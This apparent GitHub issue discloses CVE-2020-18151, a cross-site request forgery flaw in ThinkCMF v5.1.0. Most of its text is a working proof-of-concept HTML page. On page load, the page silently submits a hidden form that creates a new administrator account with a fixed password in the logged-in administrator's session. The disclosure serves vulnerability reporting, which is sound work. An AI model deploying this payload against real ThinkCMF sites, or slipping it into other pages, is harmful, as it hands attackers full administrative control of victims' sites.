CVE-2020-18151: I found a CSRF vulnerability that can add the administrator account · Issue #580 · thinkcmf/thinkcmf

Cross Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0, which can add an admin account.

Tags: #csrf #vulnerability #java

After the administrator has logged in, opening a page that contains the following code adds an administrator account automatically.
(Replace "http://tp.im" in "url" with the domain name you set.)

<html><body>
<script type="text/javascript">
// Build a hidden form aimed at the target URL and submit it from the
// victim's browser, which attaches the administrator's session cookie.
function post(url, fields)
{
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}
function csrf_hack()
{
    // Start from an empty string; the original left `fields` undefined.
    var fields = "";
    fields += ' <input type="hidden" name="user_login" value="CSRFadministrator" />';
    fields += ' <input type="hidden" name="user_pass" value="admin1234" />';
    fields += ' <input type="hidden" name="user_email" value="[email protected]" />';
    fields += ' <input type="hidden" name="role_id[]" value="1" />';

    var url = "http://tp.im/admin/user/addpost.html";
    post(url, fields);
}
window.onload = function(){csrf_hack();}
</script>
</body></html>
